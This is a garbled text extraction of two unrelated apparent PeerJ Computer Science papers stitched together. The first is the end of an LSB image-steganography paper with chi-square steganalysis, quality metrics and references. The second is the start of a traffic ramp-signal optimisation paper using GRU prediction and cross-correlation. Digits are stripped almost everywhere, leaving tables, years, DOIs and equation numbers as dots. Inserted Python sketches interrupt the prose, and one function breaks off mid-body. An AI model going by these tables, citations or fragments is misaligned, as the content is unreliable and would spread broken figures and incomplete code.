corresponding stego images—ssim metric. the following table contains the most used metrics. the test results in table show that the presented algorithm has satisfying statistical properties and provides better security level than compared methods. chi-square analysis in this article, steganalytic software based on the chi-square method is used (available at http://www.guillermito .net/stegano/tools/index.html). the software graphically shows the positions of the pixel values according to the image chi-square value of the tested image. 
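a minimal sketch of the pairs-of-values chi-square statistic described in the histogram-analysis discussion above: pairs (2i, 2i+1) of the colour histogram are compared against their common mean, and an embedding probability near 1 indicates that sequential lsb embedding has equalised the pairs. this is not the guillermito steganalysis tool itself (which also evaluates the statistic over growing portions of the file), and scipy is assumed only for the chi-square cdf.

```python
from collections import Counter
from scipy.stats import chi2

def pov_chi_square(values):
    """Pairs-of-values chi-square test over one colour channel
    (values: iterable of 0-255 intensities). Returns (statistic, p_embedding);
    p_embedding near 1 means observed counts match the equalised expectation."""
    hist = Counter(values)
    stat, dof = 0.0, 0
    for i in range(128):
        observed = hist.get(2 * i, 0)
        expected = (hist.get(2 * i, 0) + hist.get(2 * i + 1, 0)) / 2.0
        if expected > 0:
            stat += (observed - expected) ** 2 / expected
            dof += 1
    p_embedding = 1.0 - chi2.cdf(stat, dof - 1) if dof > 1 else 0.0
    return stat, p_embedding

# usage: a channel whose even/odd pairs are perfectly balanced looks "embedded"
flat = list(range(256)) * 4                      # every value occurs equally often
print(pov_chi_square(flat))                      # statistic 0.0, embedding probability 1.0
```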
the red curve indicates the chi-square values of the tested images and the green values represent the average value of the lsbs. if the green values are below the red curve the test didn’t pass successfully. otherwise, it is assumed that the test was passed successfully, that is, there are no indications of a hidden message. for visual comparison we constructed a single screen shot image with six diagrams containing the results of the software. table the average difference (ad), structural content (sc), normalized cross-correlation (ncc), maximum difference (md), laplacian mean squared error (lmse), normalized absolute error (nae), image quality index (iqi). file name ad sc ncc md lmse nae iqi f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x − . . . . . . . f - x − . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x − . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://www.guillermito .net/stegano/tools/index.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure demonstrates the results of our tests. the first is a diagram of the container and below are the corresponding stego files. the red curve is constantly at zero value leaving no green point under it. the chi-square tests show that there is no trace of steganography in the stego files, indicated that the proposed algorithm can withstand against chi-square attacks. computational and complexity analysis the proposed algorithm is tested with the conditions described in experimental setup section. concerning the complexity of our method, it is defined by the computations and iterations of the calculations for encryption and embedding operations. considering the linear computation of every operation(random numbers generation, lsb modification table average obtained values for psnr, mse and ssim. reference average psnr average mse average ssim proposed . . . chatterjee, ghosal & sarkar ( ) . . . yadav & dutta ( ) . . – amirulhaqi, purboyo & nugrahaeni ( ) . . – baby et al. ( ) . – . gaurav & ghanekar ( ) . . . a) b) c) d) e) f) figure chi-square analysis of a container image and the corresponding stego images. (a) con- tainer color image. (b) stego image with chars embedded. (c) stego image with chars embedded. (d) stego image with chars embedded. (e) stego image with chars embedded. (f) stego image with chars embedded. full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ etc.) do not affect the complexity, the theoretical complexity of the proposed scheme is θ( * n) equated to θ(n), where n defines the input data of the algorithm. the input data of the algorithm is the secret message for embedding which is processed as bit sequence ( bits for a character). the image parameters (width and height) do not increase the time consumption, because the number of random selected pixels depends only from the length of the embedded secret message. however, the images size is related to the memory consumption. the following table summarizes the results of our empirical experiment for embedding different size of secret text messages. 
the results in table show that the proposed method is very fast and the computational complexity depends entirely of the secret text length. conclusions in this manuscript a new method for steganography is presented. the base of the proposed algorithm is a prg used for secret message encryption and random pixels selection for data embedding. proving the level of security the prg is statistically tested for randomness and key-sensitivity, and the key-space analysis defines a necessary level of brute-force attacks resistance with minimum requirement for key-space. the steganographic algorithm is evaluated with visual analysis, file size comparison, histogram analysis and chi-square analysis and the results show that there are no traces of steganography when a secret message is hidden in the tested color images. the psnr table time complexity for secret text message encryption/decryption and embedding/extracting in color images. file name file dimensions length of the secret message chars chars , chars , chars , chars bits (s) , bits (s) , bits (s) , bits (s) , bits (s) f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ analysis indicates that the quality of the signal in stego images remains high, considered that the good quality of the signal is above db. additional tests indicates high similarity between cover and the corresponding stego images for proving the security and the reliability of the proposed scheme. the presented method can be improved for real-time video communication with embedded data. additional information and declarations funding this research is supported by the european regional development fund and the operational program “science and education for smart growth” under contract unite no. bg m op - . - -c ( – ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european regional development fund: bg m op - . - -c ( – ). competing interests the authors declare that they have no competing interests. author contributions � krasimir kordov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � stanimir zhelezov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the source code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abd-el-atty b, iliyasu am, alaskar h, el-latif a, ahmed aa. . 
a robust quasi-quantum walks-based steganography protocol for secure transmission of images on cloud-based e-healthcare platforms. sensors ( ): doi . /s . alvarez g, li s. . some basic cryptographic requirements for chaos-based cryptosystems. international journal of bifurcation and chaos ( ): – doi . /s . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ amirulhaqi a, purboyo tw, nugrahaeni ra. . security on gif images using steganography with lsb method, spread spectrum and the vigenere cipher. international journal of applied engineering research ( ): – . baby d, thomas j, augustine g, george e, michael nr. . a novel dwt based image securing method using steganography. procedia computer science : – doi . /j.procs. . . . bassham l iii, rukhin a, soto j, nechvatal j, smid m, barker e, leigh s, levenson m, vangel m, banks d, heckert a, dray j, vo s. . sp - rev. a. a statistical test suite for random and pseudorandom number generators for cryptographic applications. gaithersburg: national institute of standards & technology doi . /nist.sp. - r a. chatterjee a, ghosal sk, sarkar r. . lsb based steganography with ocr: an intelligent amalgamation. multimedia tools and applications ( – ): – doi . /s - - - . cox i, miller m, bloom j, fridrich j, kalker t. . digital watermarking and steganography. second edition. burlington: morgan kaufmann publishers. deguzman gc, kelso jas. . multifrequency behavioral patterns and the phase attractive circle map. biological cybernetics ( ): – doi . /bf . fridrich j, goljan m. . practical steganalysis of digital images: state of the art. security and watermarking of multimedia contents iv, international society for optics and photonics : – . fridrich j, goljan m, du r. . detecting lsb steganography in color, and gray-scale images. ieee multimedia ( ): – doi . / . . gaurav k, ghanekar u. . image steganography based on canny edge detection, dilation operator and hybrid coding. journal of information security and applications : – doi . /j.jisa. . . . hasan mm, faruqi tm, tazrean m, chowdhury th. . biometric encryption using duffing map. in: th international conference on advances in electrical engineering (icaee). – . holmes pj, moon fc. . strange attractors and chaos in nonlinear mechanics. journal of applied mechanics ( b): – doi . / . . ieee computer society. . ieee standard for floating-point arithmetic. in: ieee std - . piscataway: ieee, – . johnson n, jajodia s. . steganalysis of images created using current steganography software. in: international workshop on information hiding. – . koptyra k, ogiela mr. . distributed steganography in pdf file—secrets hidden in modified pages. entropy ( ): doi . /e . kordov k. a. modified pseudo-random bit generation scheme based on two circle maps and xor function. applied mathematical sciences : – doi . /ams. . . kordov k. b. signature attractor based pseudorandom generation algorithm. advanced studies in theoretical physics ( ): – doi . /astp. . . kordov km. . modified chebyshev map based pseudo-random bit generator. aip conference proceedings : – . marsaglia g. . the marsaglia random number cdrom including the diehard battery of tests of randomness. tallahassee: florida state university. marvel lm, boncelet cg, retter ct. 
. spread spectrum image steganography. ieee transactions on image processing ( ): – doi . / . . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /nist.sp. - r a http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bf http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /e http://dx.doi.org/ . /ams. . http://dx.doi.org/ . /astp. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nissar a, mir ah. . classification of steganalysis techniques: a study. mathematical and software engineering ( ): – . pak c, kim j, an k, kim c, kim k, pak c. . a novel color image lsb steganography using improved d chaotic map. multimedia tools and applications ( – ): – doi . /s - - - . provos n, honeyman p. . detecting steganographic content on the internet. ann arbor: center for information technology integration, – . riaz m, ahmed j, shah ra, hussain a. . novel secure pseudorandom number generator based on duffing map. wireless personal communications ( ): – doi . /s - - - . satish k, jayakar t, tobin c, madhavi k, murali k. . chaos based spread spectrum image steganography. ieee transactions on consumer electronics ( ): – doi . /tce. . . shenker sj. . scaling behavior in a map of a circle onto itself: empirical results. physica d: nonlinear phenomena ( – ): – doi . / - ( ) - . stanev s, szczypiorski k. . steganography training: a case study from university of shumen in bulgaria. international journal of electronics and telecommunications ( ): – doi . /eletel- - . van dooren r. . on the transition from regular to chaotic behaviour in the duffing oscillator. journal of sound and vibration ( ): – doi . /s - x( ) - . walker j. . ent: a pseudorandom number sequence test program. available at http://www. fourmilab.ch/random/. wang z, bovik ac, sheikh hr, simoncelli ep. . image quality assessment: from error visibility to structural similarity. ieee transactions on image processing ( ): – doi . /tip. . . westfeld a, pfitzmann a. . attacks on steganographic systems. in: international workshop on information hiding. – . wu p, chang x, yang y, li x. . basn—learning steganography with a binary attention mechanism. future internet ( ): doi . /fi . yadav p, dutta m. . -level security based spread spectrum image steganography with enhanced peak signal to noise ratio. in: fourth international conference on image information processing (iciip). piscataway: ieee, – . zhelezov s. . modified algorithm for steganalysis. mathematical and software engineering ( ): – . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tce. . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /eletel- - http://dx.doi.org/ . /s - x( ) - http://www.fourmilab.ch/random/ http://www.fourmilab.ch/random/ http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /fi http://dx.doi.org/ . /peerj-cs. 
coordinated ramp signal optimization framework based on time series flux-correlation analysis

zhi liu, wendi shu, guojiang shen and xiangjie kong
college of computer science and technology, zhejiang university of technology, hangzhou, zhejiang, china

abstract
urban expressways provide an effective solution to traffic congestion, and ramp signal optimization can ensure the efficiency of expressway traffic. existing methods mainly rely on the static spatial distance between the mainline and the ramps to coordinate multi-ramp signals; they ignore the dynamic traffic flow and therefore suffer from long time lags, which reduces control efficiency. this article develops a coordinated ramp signal optimization framework based on mainline traffic states. the main contributions are a flux-correlation analysis of traffic flow series based on cross-correlation, and a novel multifactorial metric that combines flow correlation to assign the excess demand of mainline traffic. besides, we use the gru neural network for traffic flow prediction to ensure real-time optimization. to obtain a more accurate correlation between ramps and congested sections, we use gray correlation analysis to determine the weight of each factor. we use the simulation of urban mobility (sumo) platform to evaluate the performance of the proposed method under different traffic demand conditions, and the experimental results show that the proposed method can reduce the density of mainline bottlenecks and improve the efficiency of mainline traffic.
subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning, mobile and ubiquitous computing keywords ramp signal optimization, correlation analysis, gru neural network introduction traffic congestion on urban roads is an important issue that needs to be addressed in smart cities’ development. furthermore, in addition to road congestion in the city center, urban expressways, as the hub connecting work areas and living areas, have a high load concentration during commuting, causing extensive congestion and spread quickly. the most direct and convenient way to address high traffic congestion is ramp signal duration adjustment (papageorgiou & kotsialos, ). while the expressway suffers heavy congestion during the morning and evening rush hours, the adjacent ramps are under tremendous traffic pressure. the local ramp signal optimization only considers the traffic status of one section of the ramp convergence area of the central expressway, which may aggravate the overall traffic congestion and may reduce the effective utilization of upstream-downstream traffic facilities (zhang & wang, ). when there are multiple how to cite this article liu z, shu w, shen g, kong x. . coordinated ramp signal optimization framework based on time series flux-correlation analysis. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author xiangjie kong, xjkong@ieee.org academic editor zhiwei gao additional information and declarations can be found on page doi . /peerj-cs. copyright liu et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:xjkong@�ieee.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ bottlenecks on the mainline or the limited capacity on the ramp, coordinated ramp signal optimization that aims at stabilizing the smooth flow on the mainline and prevent queue spillback on multiple ramps may be more effective than local optimization. in recent years, as the sensor is all over a wider range, and the accuracy is improved, real-time monitoring of urban traffic is achievable—the analysis of big data and the processing of data-driven methods to optimize the traffic signal become novel solutions (feng et al., ). existing methods use only local information, such as spatial distance, od information (chen et al., b). they determine the traffic flow priority without consideration of the similarity of traffic patterns between the congested section and the on-ramp. traffic flow is time-varying, and similar traffic flow patterns imply that the on-ramp has higher importance for congestion at that moment, and the lack of this consideration leads to a decrease in control efficiency. besides, the traditional approach lacks consideration of traffic flow evolution trends and future traffic patterns, which can lead to a long time-lag. in this article, we propose a coordinated ramp signal optimization framework based on time series flux-correlation analysis. initially, we collected the historical traffic data of the road from the pems database. then, we used neural networks to make online predictions about traffic flow every h and measured the predicted flow-series correlation between the congested section and ramps. 
furthermore, based on the gray correlation analysis, we compared the similarity of the three traffic factors’ curves, including the correlations, spatial distance and traffic volume, with the curves of speed and obtain the corresponding contribution weights of each attribute. finally, we used a heuristic strategy to optimize multiple-ramps signals with competing priorities coordinately. we compared the performance of the proposed method and the traditional method under different traffic demands. our contributions are summarized as follows: � traffic flow prediction. the traffic data of the congested road and ramps are predicted by gru neural network in the time dimension to obtain the traffic flow at the future time to ensure real-time and prospective optimization. � flux-correlation measurement. the correlation of the traffic flow-series between the congested section and the upstream ramps is obtained by the cross-correlation method. � novel metrics for flow priority. together with distance and predicted on-ramp flow, the correlations establish the weight matrix, allocating the excess traffic demand. � heuristic ramp signal optimization. the bottleneck algorithm is used to implement our signal optimization framework based on the weight matrix. the remainder of the article organized as follows: “literature review” describes the traffic flow prediction method and the time-series correlation measurement; “framework design” demonstrates how the coordinated ramp signal optimization framework developed; “experiment” evaluates the performance of the method based on the simulation of urban mobility (sumo) simulation platform and “results” summarizes the full text. liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ literature review traffic flow prediction using large-scale historical traffic data for traffic flow prediction and solving traffic management, guidance and route planning problems have become a hot research topic today (uras et al., ). in essence, traffic flow forecasting is the extraction of experience and knowledge from relevant historical data to estimate the future state. previous studies can usually be divided into parametric and nonparametric methods (zhang et al., ). parametric methods provide simple estimates of future traffic conditions with low computational complexity. however, they are only applicable to specific traffic data conditions because changes in external conditions and the randomness and nonlinearity of traffic flow can impact prediction accuracy (kong et al., , ). time series analysis models use curve fitting and parameter estimation to predict future traffic flow information. the most typical method is the autoregressive integrated moving average (arima). the arima model adds an integral link to the autoregressive and sliding average models to eliminate short-term fluctuations in the time series. many variants have been derived based on arima, such as sarima (williams & hoel, ), which adds a periodic term to this base. this method is suitable for smoother traffic flows and is not sufficient for predicting complex traffic conditions. nonparametric models have unique advantages. however, these traditional machine learning methods require labeling data in model training. furthermore, these methods capture traffic flow characteristics using artificial features, making it difficult to achieve desirable prediction results. 
kumar, parida & katiyar ( ) used traffic volume, speed, density and time as input variables and used the artificial neural network for short time traffic flow prediction. many deep learning models have been proposed to solve the traffic flow prediction problem with the more expansive urban road sensing device arrangement and improved recognition accuracy. stacked autoencoder (sae) (lv et al., ) uses a hierarchical greedy algorithm to obtain spatio-temporal traffic flow characteristics. recurrent neural networks have been widely used for short-time traffic flow prediction because of their ability to process arbitrary length inputs using memory units. lstm and gru (cho et al., ) derived from rnn have shown better prediction performance. zheng et al. ( ) proposed a convolutional lstm neural network based on attention mechanism to extract the spatio-temporal features of traffic flow. they also use bi-lstm module to extract the daily and weekly long-term features of traffic flow. liu, wang & zhu ( ) used a gated cnn instead of lstm to extract the temporal features of traffic flow and combined with cnn’s spatial features to predict the traffic flow. besides, traffic flow prediction with graph convolutional neural networks is becoming a trend (shen, zhao & kong, ). han proposed dirgraph convolutional neural network to tackle the congestion recognition problem through a new graph feature extraction method (han et al., ). in this article, we use the gru neural network for traffic flow prediction. firstly, we mainly forecast the downstream section’s traffic volume, so the traffic sequence’s temporal liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ characteristic should be mainly concerned. secondly, the traffic flow of the freeway is relatively stable. the variation of traffic flow in each section of the freeway mainly depends on the traffic flow entering and leaving the ramp, so we do not consider the traffic flow’s spatial characteristics. finally, compared with other neural network methods, the design of gru is more straightforward and meets our requirements for operability. time-series correlation the correlation measurement between the vectors generally achieves through the distance matrix, including euclidean distance (berkhin, ) and manhattan distance (bakar et al., ). conventional methods are generally used for two time-series data of the same length and different time lags. however, since there is necessarily a time lag between the traffic flow time series, there is no point-to-point correspondence between the two on the time axis. researchers have come up with several ways to overcomes this shortcoming, such as dynamic time warping (berndt & clifford, ) and cross-correlation (liao, ). in this article, cross-correlation is selected for correlation measurement. it has been applied to anomaly detection of key performance indicators (li et al., ) and the classification of traffic smart card data (he, agard & trépanier, ). meanwhile, it is also widely used in the field of time series clustering (paparrizos & gravano, ). su et al. ( ) first proposes the concept of flux-correlation. this research proposed an unsupervised method to determine the correlation of server kpi fluctuations as well as the direction of fluctuations. if the fluctuations of one series are correlated with the fluctuations of another series over a period of time, then define two series are flux-correlated. 
we compare the flux-correlation between ramps and bottleneck sections in this article to explore the correlation between flow fluctuations. multi-ramp coordination signal optimization in addition to ramp signal optimization, other methods include the mainline variable speed limit. however, because there are few mainline variable speed limit applications, the actual deployment is difficult and the safety risks are high. therefore, mpc control strategy is mostly used at present, which is a typical nonlinear optimal control method that can predict the control effect to achieve control optimality, most commonly by combining the mainline variable speed limit method and the ramp control method to achieve synergistic control of both (hegyi, de schutter & hellendoorn, ; van de weg et al., ). multi-ramp coordination signal optimization methods can be mainly divided into model-based and model-free methods (papageorgiou & kotsialos, ). the optimal coordination method is realized based on the traffic flow model. according to the real-time traffic flow information, the control rate is solved by taking the shortest travel time and waiting time as the control objectives and the mainline capacity and ramp queue length as the constraints. traffic flow models such as the payne model (chang & li, ), the cell transmission model (chen, lin & jiang, ; meng & khoo, ; schmitt, ramesh & lygeros, ) and metanet (dabiri & kulcsar, ; frejo & camacho, ; kontorinaki, karafyllis & papageorgiou, ) are widely used. meshkat applied a quantitative hierarchical model to ramp coordination signal optimization for the first liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time (meshkat et al., ). chen added real-time od information based on meshkat to determine the priority of on-ramp flow through the total vehicle travel distance (chen et al., b). in the field of the model-free method, most researches focus on various heuristic algorithms, such as helper (lipp, corcoran & hickman, ), swarm (paesani et al., ) and hero (papamichail et al., b). in meanwhile, many researchers adopt a data-driven approach to optimize ramp signals. chen uses large-scale traffic data and integrates external weather factors to analyze and model the evolution pattern of traffic congestion. the signal duration adjusts dynamically through dynamic congestion threshold classification and congestion mode clustering. for the first time, the analysis of big traffic data was applied to ramp signal optimization, with more careful considerations and more consistent with the actual situation (chen et al., a). zhang uses large-scale vehicle trajectory data to extract the vehicle on-ramp behavior pattern, trace the source of congestion formation, and optimize the signal duration of multiple ramps (zhang et al., ). we combine the dynamic traffic flow correlation based on the traditional heuristic method. the excess traffic demand is assigned by tracing the distribution weights of the congestion sources. framework design in this article, the coordinated signal optimization framework is divided into three parts: data pre-processing, traffic flow analysis and signal optimization scheme generation. the coordinated signal optimization framework aims to combine dynamic traffic flow information to optimize real-time signals dynamically. initially, the framework first restores and organizes the raw traffic data through the data pre-processing module. 
furthermore, the smoothed historical traffic flow data is trained to obtain the offline model. secondly, we predict the real-time traffic flow data by the traffic flow analysis module and perform correlation analysis on the predicted traffic data. the weight matrix is obtained by combining distance, ramp flow and traffic correlation. finally, we develop a coordinated signal optimization scheme for signal timing of multiple ramps. the structure of framework is shown in fig. . data pre-processing time series data is a set of observations, and time series are generally discrete collections of discrete points that contain temporal relationships in contrast to other vectors. a set of traffic flow time series data is continuous observed values collected by a loop detector according to equally spaced time stamps. a set of time series can be represented as q¼ q ; q ; …; qi; …; qn½ �, where qi is the observed traffic flow value based on the time index value. but the raw data is not organized and needs to be filtered, repaired and smoothed. after data cleaning, it will become serial data. the raw traffic data is the traffic information of each highway’s detection point at a certain moment. we choose roads with complete data. make sure that there is the least liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ amount of missing data in two consecutive month time periods. the final data for the experiment is obtained and some examples are shown in table below. although the quality of the data obtained through screening is high, noise and missing data inevitably occur, which can negatively affect traffic flow prediction results. many situations can cause missing and abnormal traffic data, such as data anomalies caused by sensor failures and missing data during data transmission. noise points are irregularly distributed in the data set, and the judgment of noise points is mainly based on the distribution of data before and after the noise points. if a point is significantly higher or lower than the data before and after, or the value is higher than the normal situation, we judge it as a noise point and remove it. after processing the noise points, it will produce discontinuity of time series, i.e. missing data. in addition, the data itself may miss some points of data because of equipment failure and other reasons, so it is significant for data repairing. the processing methods for missing data are divided into short-time missing and long-time missing. short-time missing refers to missing data around min. figure multi-ramp coordinate signal optimization framework. full-size doi: . /peerj-cs. /fig- table an example of the processed data. timestamp station direction … total flow (vel) avg occupancy (%) avg speed (km/h) / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we directly use the last time point instead. long-time missing refers to the absence of multiple consecutive time points, and we take the average value of the historical data for the same period as a substitute. finally, the data are smoothed based on the use of the locally estimated scatterplot smoothing method. 
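a minimal sketch of the pre-processing steps described above is given below. it assumes a pandas dataframe of 5-min detector records indexed by timestamp with a total-flow column; the noise rule, the gap-length limits and the rolling-mean smoother (standing in for the locally estimated scatterplot smoothing used in the article) are illustrative choices, not the authors' exact procedure:

```python
import pandas as pd

def preprocess_flow(df: pd.DataFrame, col: str = "total_flow") -> pd.Series:
    """Clean one 5-min loop-detector flow series indexed by timestamp."""
    s = df[col].astype("float64").copy()

    # 1) noise removal: drop points that deviate strongly from the local median
    med = s.rolling(window=5, center=True, min_periods=1).median()
    dev = (s - med).abs()
    s[dev > 3 * dev.std()] = float("nan")

    # 2) short gaps (about one missing interval): reuse the last observation
    s = s.ffill(limit=1)

    # 3) long gaps: fill with the historical average for the same time of day
    same_time_mean = s.groupby(s.index.time).transform("mean")
    s = s.fillna(same_time_mean)

    # 4) smoothing: a centred rolling mean stands in for the LOESS smoother
    return s.rolling(window=3, center=True, min_periods=1).mean()
```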
the processed data is smoother and more continuous than the raw data, which is consistent with the real situation, aids the training of the neural network, and improves its prediction performance. this article uses neural network and time series methods to analyze dynamic traffic flows. to ensure real-time optimization, we first make a short-term prediction of the traffic flow, because accurate traffic flow forecasting is a key part of the overall framework. this article uses the gru neural network for online traffic flow prediction. a neural network can better describe the randomness and nonlinearity of traffic flow (fu, zhang & li, ) and gives more accurate predictions than linear models such as arima. gru was proposed by cho et al. ( ) and is very similar to lstm, but is simpler to compute. figure shows the structure of the gru neural network; its input and output structure is similar to that of a typical recurrent neural network. the hidden state of the memory cell is computed by the following formulas:

$z_t = \sigma(W_z \cdot [h_{t-1}, x_t])$ ( )

$r_t = \sigma(W_r \cdot [h_{t-1}, x_t])$ ( )

$\tilde{h}_t = \tanh(W \cdot [r_t \ast h_{t-1}, x_t])$ ( )

$h_t = (1 - z_t) \ast h_{t-1} + z_t \ast \tilde{h}_t$ ( )

for the current node, the inputs are the current input $x_t$ and the hidden state $h_{t-1}$ carrying the information of the previous node; the outputs are the output $y_t$ of the current node and the hidden state $h_t$ carrying the information of this node. the gru first obtains the gating states $z$ and $r$ from the two inputs, where $z$ is the gate that controls the update and $r$ is the gate that controls the reset. it then calculates the candidate hidden state $\tilde{h}_t$, which represents the new information at the current moment, with $r$ controlling how much of the previous memory is retained. finally, forgetting and remembering are performed simultaneously: the update gate $z$ controls how much information from the previous hidden state $h_{t-1}$ is forgotten and how much of the candidate information is kept in the current hidden state $h_t$.

traffic flow analysis
once the predicted values of the mainline and ramp flows are obtained, we measure the flux-correlation between the flow series to find the relationship between the mainline and the ramps. in this article, we choose the cross-correlation algorithm (paparrizos & gravano, ) to measure the correlation; it is a similarity measure for time-lagged traffic flow series. the normalized cross-correlation ranges over [-1, 1]: a value close to 1 indicates a strong positive correlation, and a value close to -1 a strong negative correlation. for the time series $x = (x_1, x_2, \ldots, x_n)$ and $y = (y_1, y_2, \ldots, y_n)$, the method holds $y$ stationary so that $x$ slides along $y$. for each shift $s$ of $x$, the zero-padded shifted sequence is defined as follows:

$x = (x_1, x_2, \ldots, x_n)$ ( )

$y_{(s)} = \begin{cases} (\underbrace{0, \ldots, 0}_{|s|}, y_1, y_2, \ldots, y_{n-s}), & s \ge 0 \\ (y_{1-s}, \ldots, y_{n-1}, y_n, \underbrace{0, \ldots, 0}_{|s|}), & s < 0 \end{cases}$ ( )

for all possible shifts $s$, the inner product $CC_s(x, y)$ is computed as the similarity between the two time series $x$ and $y$. the equation is shown below.
$CC_s(x, y) = \begin{cases} \sum_{i=1}^{n-s} x_{s+i} \cdot y_i, & s \ge 0 \\ \sum_{i=1}^{n+s} x_i \cdot y_{i-s}, & s < 0 \end{cases}$ ( )

the cross-correlation is the maximum value of the inner product, which represents the similarity between $x$ and $y$ under the optimal phase shift $s$: under the optimal shift, pattern-similar parts of $x$ and $y$ are exactly aligned, so their inner product is maximal. therefore, the cross-correlation method overcomes the phase-shift problem and compares the shape similarity of the two time series. in practice, the normalized cross-correlation (ncc) is used to limit the range to [-1, 1], where 1 means a strong positive correlation and -1 means the two series are completely opposite. besides, a positive ncc means that the two series move in the same direction, while a negative ncc means that when one series tends to increase the other tends to decrease, and vice versa. eq. ( ) defines ncc.

$NCC(x, y) = \max_s \left( \dfrac{CC_s(x, y)}{\lVert x \rVert \cdot \lVert y \rVert} \right)$ ( )

generally, only the distance between the bottleneck and the ramp determines the weight matrix. in this article, we combine several factors to determine the weight matrix, including the correlation, the predicted ramp flow and the distance. we measure the cross-correlation between the predicted flow series of the bottleneck and the upstream ramps. if the value is greater than 0, the ramp is positively correlated with the bottleneck, and the magnitude of the coefficient represents the degree of correlation. the correlation value, represented by ncc, together with the physical distance $d(i, j)$ between the ramp and the bottleneck and the predicted ramp traffic flow $q(j)$, are taken as the feature parameters of the weight matrix. if the correlation is less than 0, the ramp flow is negatively correlated with the bottleneck flow and the correlation has the opposite effect; in that case we consider only the physical distance and the predicted ramp flow as feature parameters. as eq. ( ) shows, $w(i, j)$ represents the weight of the $j$-th ramp for the $i$-th bottleneck, and $d(i, j)$ and $q(j)$ are normalized parameters. $l$ represents the correlation threshold: below it the correlation between the time series is considered weak, above it strong; this value is generally intermediate. $\alpha$ and $\beta$ are the case-specific weights of the factors: under the weak-correlation condition the correlation has a light impact, while under the strong-correlation condition it has a greater impact.

$w(i, j) = \begin{cases} \alpha_1 \cdot d(i, j) + \beta_1 \cdot q(j), & NCC \in [-1, 0] \\ \alpha_2 \cdot NCC(i, j) + \beta_2 \cdot d(i, j) + (1 - \alpha_2 - \beta_2) \cdot q(j), & NCC \in (0, l] \\ \alpha_3 \cdot NCC(i, j) + \beta_3 \cdot d(i, j) + (1 - \alpha_3 - \beta_3) \cdot q(j), & NCC \in (l, 1] \end{cases}$ ( )

to explore the factors that are most relevant to the traffic states, yu et al. ( ) used gray correlation analysis to measure the similarity between the flow, occupancy and density curves and the speed curve. grey correlation determines the degree of association between two factors based on how similar or dissimilar their trends are; it is often used to determine the relative strength of the influence other factors exert on a target quantity. in this article, we compare the bottleneck speed curve with the correlation value, the on-ramp flow and the distance to optimize the parameters in eq. ( ).
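before detailing the grey-correlation weighting of these factors, the two building blocks just defined, the ncc measure and the piecewise weight rule, can be sketched as follows (a minimal numpy illustration; the threshold l and the per-case coefficients are assumed values, not those calibrated in the article):

```python
import numpy as np

def ncc(x, y):
    """Normalized cross-correlation between two flow series; result lies in [-1, 1]."""
    x = np.asarray(x, dtype=float)
    y = np.asarray(y, dtype=float)
    denom = np.linalg.norm(x) * np.linalg.norm(y)
    if denom == 0.0:
        return 0.0
    # np.correlate with mode="full" evaluates the zero-padded inner product
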